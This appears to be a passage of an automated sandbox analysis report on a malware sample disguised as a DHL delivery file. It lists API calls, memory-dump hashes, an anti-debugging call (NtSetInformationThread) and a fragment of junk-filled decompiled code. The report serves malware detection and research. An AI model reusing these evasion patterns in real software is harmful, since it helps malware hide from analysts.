                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040F91C
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F955
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000178), ref: 0040F9A2
                        • __vbaI4Var.MSVBVM60(?), ref: 0040F9F8
                        • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040FA33
                        • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040FA47
                        • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,0033B88B,?,?,?,?,?), ref: 0040FAC0
                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0040FAD5
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FAF0
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB29
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000170), ref: 0040FB73
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E54C,000006FC,?,?,?,5C48BED0,00005B07,?), ref: 0040FC07
                        • __vbaFreeObj.MSVBVM60(?,?,?,5C48BED0,00005B07,?), ref: 0040FC27
                        • __vbaFreeVar.MSVBVM60(?,?,?,5C48BED0,00005B07,?), ref: 0040FC2F
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,5C48BED0,00005B07,?), ref: 0040FC47
                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,5C48BED0,00005B07,?), ref: 0040FC80
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000160,?,?,?,5C48BED0,00005B07,?), ref: 0040FCCA
                        • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,5C48BED0,00005B07,?), ref: 0040FCE9
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FD04
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FD3D
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000120), ref: 0040FD8A
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FDB1
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FDEA
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,00000070), ref: 0040FE31
                        • __vbaStrCopy.MSVBVM60(00000000,?,0040E6F8,00000070), ref: 0040FE4D
                        • __vbaChkstk.MSVBVM60(00001BD4,?,00000000), ref: 0040FEB3
                        • __vbaI4Var.MSVBVM60(?,?,00001BD4,?,00000000), ref: 0040FECF
                        • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0040FEED
                        • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,00000000), ref: 0040FF04
                        • __vbaFreeVar.MSVBVM60 ref: 0040FF0F
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FF27
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FF60
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,00000198), ref: 0040FFAA
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0040FFD1
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041000A
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000160), ref: 00410054
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041007B
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004100B4
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,000001C0), ref: 00410101
                        • __vbaStrCopy.MSVBVM60(00000000,?,0040E6B4,000001C0), ref: 00410162
                        • __vbaChkstk.MSVBVM60(?), ref: 00410170
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E54C,00000700), ref: 004101C3
                        • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004101E1
                        • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004101F7
                        • __vbaFreeVar.MSVBVM60 ref: 00410202
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041021A
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410253
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000001DC), ref: 0041029D
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 004102C4
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004102FD
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,00000130), ref: 00410347
                        • __vbaLateIdCallLd.MSVBVM60(?,00000000,00000000,00000000), ref: 00410369
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 00410384
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004103BD
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,00000198), ref: 00410407
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041042E
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410467
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000000F8), ref: 004104B1
                        • __vbaChkstk.MSVBVM60(00000000,?,0040E6F8,000000F8), ref: 0041055C
                        • __vbaStrVarMove.MSVBVM60(?,00000008,002C9400,0000375E), ref: 00410587
                        • __vbaStrMove.MSVBVM60(?,00000008,002C9400,0000375E), ref: 00410591
                        • __vbaFreeStr.MSVBVM60 ref: 004105BA
                        • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004105D5
                        • __vbaFreeVarList.MSVBVM60(00000004,00000008,?,00000008,00000008), ref: 004105F8
                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040E51C,000002B4), ref: 00410632
                        • __vbaOnError.MSVBVM60(00000001), ref: 00410648
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$CheckFreeHresult$New2$List$Chkstk$Move$CallCopyLate$#610$#540#562#704#711Ary1DerefError
                        • String ID: ^7$omregn$pseudoinspirational$tilkendende
                        • API String ID: 3417047510-2015756608
                        • Opcode ID: 963aac548ce047ad53cf4d369cb9e0238aff69dc94b36b69d2c7beb30a522c71
                        • Instruction ID: 9930bc61fc3dacaeb4dbef84097dc737169efedd166e4f38aba8d7488f7d4e75
                        • Opcode Fuzzy Hash: 963aac548ce047ad53cf4d369cb9e0238aff69dc94b36b69d2c7beb30a522c71
                        • Instruction Fuzzy Hash: 4CC20571900218DFDB20DF90CC45BDDBBB9BB08304F1045EAE609BB2A1DB795A99DF58
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: f5234c9825c58b4e4cfeff7dc7c2d539e72c9b55ba1ed23977f23d87668f6550
                        • Instruction ID: 468864660f8f21b6a1c0b9f55b9cd07f7c4a01cfe35a77fd2c362b13d6011b89
                        • Opcode Fuzzy Hash: f5234c9825c58b4e4cfeff7dc7c2d539e72c9b55ba1ed23977f23d87668f6550
                        • Instruction Fuzzy Hash: 8FD19C5DEC5307B9EF34286849B97FA12574F577F0FAA022ADC96430C5E71784C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 2e46b7e7a12f829c12ed6fca399298779a66d2b5cb60b68caa9360eb807cc354
                        • Instruction ID: 76322e03a3a91efdde72527b252e1811cb5abd6833039a719376f99ef5835dcd
                        • Opcode Fuzzy Hash: 2e46b7e7a12f829c12ed6fca399298779a66d2b5cb60b68caa9360eb807cc354
                        • Instruction Fuzzy Hash: AFB16A5DEC5307B9EF38286849B57FB12574F537F0FAA022ADC9A830C5E72A80C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        • Opcode ID: 51b39b1054d3278c65eb1c54a7a48d2da29df0160f5134753ca881bea61d6a9c
                        • Instruction ID: e9aa63952360819f719e1cedc5adf3ab7a838d93263f30c40851470e5fb97153
                        • Opcode Fuzzy Hash: 51b39b1054d3278c65eb1c54a7a48d2da29df0160f5134753ca881bea61d6a9c
                        • Instruction Fuzzy Hash: 0BB18E5DEC5307B9EF38286849B97FA12574F537F0FAA062ADC96870C5E71B80C6C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 4l?R$4l?R
                        • API String ID: 1029625771-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 560597551-3666051665
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationProcessTerminateThread
                        • String ID: 4l?R$4l?R
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: #100
                        • String ID: VB5!6&*
                        Uniqueness

                        Uniqueness Score: 1.18%

                        C-Code - Quality: 95%
                        			E00401983(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                        				void* _t925;
                        				char _t928;
                        				intOrPtr* _t929;
                        				signed int _t930;
                        				signed int _t931;
                        				intOrPtr* _t958;
                        				void* _t975;
                        				void* _t981;
                        				void* _t985;
                        				void* _t989;
                        				void* _t990;
                        				intOrPtr _t1020;
                        				intOrPtr _t1047;
                        				void* _t1057;
                        				void* _t1116;
                        				void* _t1120;
                        				void* _t1126;
                        				void* _t1130;
                        				void* _t1131;
                        				void* _t1132;
                        				void* _t1151;
                        				signed short _t1172;
                        				signed int _t1177;
                        				signed int _t1178;
                        				void* _t1186;
                        				void* _t1188;
                        				void* _t1214;
                        				void* _t1247;
                        				void* _t1275;
                        				void* _t1296;
                        				void* _t1307;
                        				void* _t1310;
                        
                        				_t1247 = __esi;
                        				_t990 = __ebx;
                        				asm("out 0x0, al");
                        				asm("aam 0xba");
                        				asm("stosd");
                        				asm("o16 in al, 0x0");
                        				asm("ror dl, 1");
                        				asm("rol byte [eax], cl");
                        				_t1186 = __edi + 1;
                        				asm("in eax, dx");
                        				asm("fiadd word [eax]");
                        				_t925 = _t1310;
                        				_t1130 = __edx + 1;
